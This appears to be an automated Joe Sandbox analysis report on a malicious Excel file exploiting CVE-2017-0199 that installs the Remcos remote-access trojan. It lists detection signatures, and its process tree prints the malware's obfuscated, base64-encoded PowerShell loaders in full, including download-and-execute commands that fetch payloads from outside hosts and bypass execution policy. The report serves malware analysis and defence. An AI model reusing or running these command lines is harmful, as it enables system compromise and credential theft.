Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OC25-11-24.xls

Overview

General Information

Sample name:OC25-11-24.xls
Analysis ID:1562330
MD5:d923dc9f1abd640e545d1992bef70fb4
SHA1:1c69fd2c258f80163dde3aa3b6e96ae9b4a42fa1
SHA256:7f8c3780744584bc15d10cd35195cad98506691e51f75714f35a295e7d4ed638
Tags:cve-2017-0199exploitxlsuser-nfsec_pl
Infos:

Detection

Remcos, HTMLPhisher
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3356 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3652 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 3760 cmdline: "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVExxUHptVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHRMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUl0R1YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2lsZGJGTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Ykt5MlcyaFo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjM0LjIwNS4xMzUvMTI0NC9jcmVhdGdvb2RpZGVhZm9yZnV0dXJlYnVzaW5lc3NkZXZlbG9wd2l0aG5pY2V0aGluZ3NnZXRiYWNrb24udElGIiwiJEVOVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIiwwLDApO3N0QVJULVNsRWVwKDMpO0lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIg=='+[ChAR]0x22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 3892 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 3992 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 4000 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3100.tmp" "c:\Users\user\AppData\Local\Temp\b53lag2c\CSCFF6E95784C84671B5586A4811C47.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 4084 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 2776 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbkVyaW1hZ2VVcmwgPSBaTTVodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWwnKydla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROScrJzUtJysnZHZpVEs1Y0FSYU5kUScrJ2piYjNtZXhmd1F6S21UWGcnKycmc2tpcHJlZz10cnVlJnBrX3ZpZCcrJz1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBaJysnTTU7bkVyd2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtuRXJpbWFnZUJ5dGVzID0gbkVyd2ViQ2xpZW50LkRvd25sb2FkRGF0YSgnKyduRXJpbWFnZVVybCk7bkVyaW1hZ2VUZXh0ID0gWycrJ1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHInKydpbmcobkVyaW1hZ2VCeScrJ3Rlcyk7bkVyc3RhcnRGbGFnID0nKycgWk01PDxCQVNFNjRfU1RBUlQ+PlpNNScrJztuRXJlbmRGbGFnID0gWk01PDxCQVNFNjRfJysnRU5EPj5aTTU7bkVyc3RhcnRJbmRleCA9IG5FcmltYWdlVGV4JysndC5JbmRleE9mKG5FcnN0YXJ0RmxhZyk7bkVyZW5kSW5kJysnZXggPSBuRXJpbWFnZVRleHQuSW5kZXhPZignKyduRXJlbmRGbGFnKTtuRScrJ3JzdGFydEluJysnZGV4IC1nZSAwIC1hbmQgbkVyZW5kSW5kZXggLWd0IG5FcnN0YXJ0SW5kZXg7bkVyc3RhcnRJbmRleCArPSBuRXJzdGFydEZsYWcuTGVuZ3RoO25FcmJhc2U2NCcrJ0wnKydlbmd0aCA9IG5FcmVuZEluZGUnKyd4IC0gbkVyc3RhJysncnRJbmRleDtuRXJiYXNlNjRDb21tYW5kID0gbkVyaW1hZ2VUZXh0LlN1YnN0cmluZyhuRXJzdGFydEluZGV4LCBuRXJiYXNlNjRMZW5ndGgnKycpO25FcmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKG5FcmJhJysnc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBKSTYgRm9yRWFjaCcrJy1PYmplY3QgeyBuRXJfIH0pWy0xLi4tKG5FcmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07bkVyY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6JysnRnJvbUJhcycrJ2U2NFN0cmluZyhuRXJiYXNlNjRSZXZlcnNlZCk7bkVybG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKG5FcmNvbW1hbmRCeXRlcyk7bkVydmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCcrJyhaTTVWQUlaTTUpO25FcnZhaU1ldGhvZC5JbnZva2UobkVybnVsbCwgQChaTTV0eHQuUlNSVlJTLycrJzQ0MjEvNTMxLjUnKycwMi40MzIuMjcxLy86cHR0aFpNNSwgWk01JysnZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNJysnNSwgWk01Q2FzUG9sWk01LCBaTTVkZXNhdGl2YWRvWk01LCBaTTVkZXNhdGl2YWRvWk01LFpNNWRlc2F0aXZhZG9aTTUsWicrJ001ZGVzYXRpdmFkb1onKydNNSxaTTVkZXNhdGl2YWRvJysnWk0nKyc1LFpNNWRlc2F0aXZhZG9aTTUsWk01ZGVzYXRpdmFkJysnb1pNNScrJyxaTTUxWk01LFpNNWRlc2F0aXZhZG9aTTUpKTsnKSAgLVJlUGxhY0UgIChbY2hhcl0xMTArW2NoYXJdNjkrW2NoYXJdMTE0KSxbY2hhcl0zNi1DUmVwbEFjRSAgJ1pNNScsW2NoYXJdMzkgIC1SZVBsYWNFKFtjaGFyXTc0K1tjaGFyXTczK1tjaGFyXTU0KSxbY2hhcl0xMjQpfCYgKCAkcFNIT01FWzRdKyRQU2hPTUVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            • powershell.exe (PID: 2116 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • CasPol.exe (PID: 3984 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 3120 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\celvhtcxiwczckrdjzxnvyxm" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 3172 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\eyqfiluzweuemqnhakkgfkrdatg" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 1652 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oavyjefskmmjowblkvxiixmujzxyrr" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
                • CasPol.exe (PID: 1920 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oavyjefskmmjowblkvxiixmujzxyrr" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
    • mshta.exe (PID: 3060 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 2960 cmdline: "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVExxUHptVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHRMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUl0R1YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2lsZGJGTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Ykt5MlcyaFo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjM0LjIwNS4xMzUvMTI0NC9jcmVhdGdvb2RpZGVhZm9yZnV0dXJlYnVzaW5lc3NkZXZlbG9wd2l0aG5pY2V0aGluZ3NnZXRiYWNrb24udElGIiwiJEVOVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIiwwLDApO3N0QVJULVNsRWVwKDMpO0lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIg=='+[ChAR]0x22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 3132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 2040 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 1992 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES77DF.tmp" "c:\Users\user\AppData\Local\Temp\ovqlooon\CSCADDA0BE83C5E4E17A4EF3CEA725DA.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 3580 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 3676 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbkVyaW1hZ2VVcmwgPSBaTTVodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWwnKydla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROScrJzUtJysnZHZpVEs1Y0FSYU5kUScrJ2piYjNtZXhmd1F6S21UWGcnKycmc2tpcHJlZz10cnVlJnBrX3ZpZCcrJz1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBaJysnTTU7bkVyd2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtuRXJpbWFnZUJ5dGVzID0gbkVyd2ViQ2xpZW50LkRvd25sb2FkRGF0YSgnKyduRXJpbWFnZVVybCk7bkVyaW1hZ2VUZXh0ID0gWycrJ1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHInKydpbmcobkVyaW1hZ2VCeScrJ3Rlcyk7bkVyc3RhcnRGbGFnID0nKycgWk01PDxCQVNFNjRfU1RBUlQ+PlpNNScrJztuRXJlbmRGbGFnID0gWk01PDxCQVNFNjRfJysnRU5EPj5aTTU7bkVyc3RhcnRJbmRleCA9IG5FcmltYWdlVGV4JysndC5JbmRleE9mKG5FcnN0YXJ0RmxhZyk7bkVyZW5kSW5kJysnZXggPSBuRXJpbWFnZVRleHQuSW5kZXhPZignKyduRXJlbmRGbGFnKTtuRScrJ3JzdGFydEluJysnZGV4IC1nZSAwIC1hbmQgbkVyZW5kSW5kZXggLWd0IG5FcnN0YXJ0SW5kZXg7bkVyc3RhcnRJbmRleCArPSBuRXJzdGFydEZsYWcuTGVuZ3RoO25FcmJhc2U2NCcrJ0wnKydlbmd0aCA9IG5FcmVuZEluZGUnKyd4IC0gbkVyc3RhJysncnRJbmRleDtuRXJiYXNlNjRDb21tYW5kID0gbkVyaW1hZ2VUZXh0LlN1YnN0cmluZyhuRXJzdGFydEluZGV4LCBuRXJiYXNlNjRMZW5ndGgnKycpO25FcmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKG5FcmJhJysnc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBKSTYgRm9yRWFjaCcrJy1PYmplY3QgeyBuRXJfIH0pWy0xLi4tKG5FcmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07bkVyY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6JysnRnJvbUJhcycrJ2U2NFN0cmluZyhuRXJiYXNlNjRSZXZlcnNlZCk7bkVybG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKG5FcmNvbW1hbmRCeXRlcyk7bkVydmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCcrJyhaTTVWQUlaTTUpO25FcnZhaU1ldGhvZC5JbnZva2UobkVybnVsbCwgQChaTTV0eHQuUlNSVlJTLycrJzQ0MjEvNTMxLjUnKycwMi40MzIuMjcxLy86cHR0aFpNNSwgWk01JysnZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNJysnNSwgWk01Q2FzUG9sWk01LCBaTTVkZXNhdGl2YWRvWk01LCBaTTVkZXNhdGl2YWRvWk01LFpNNWRlc2F0aXZhZG9aTTUsWicrJ001ZGVzYXRpdmFkb1onKydNNSxaTTVkZXNhdGl2YWRvJysnWk0nKyc1LFpNNWRlc2F0aXZhZG9aTTUsWk01ZGVzYXRpdmFkJysnb1pNNScrJyxaTTUxWk01LFpNNWRlc2F0aXZhZG9aTTUpKTsnKSAgLVJlUGxhY0UgIChbY2hhcl0xMTArW2NoYXJdNjkrW2NoYXJdMTE0KSxbY2hhcl0zNi1DUmVwbEFjRSAgJ1pNNScsW2NoYXJdMzkgIC1SZVBsYWNFKFtjaGFyXTc0K1tjaGFyXTczK1tjaGFyXTU0KSxbY2hhcl0xMjQpfCYgKCAkcFNIT01FWzRdKyRQU2hPTUVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            • powershell.exe (PID: 3964 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • CasPol.exe (PID: 3784 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

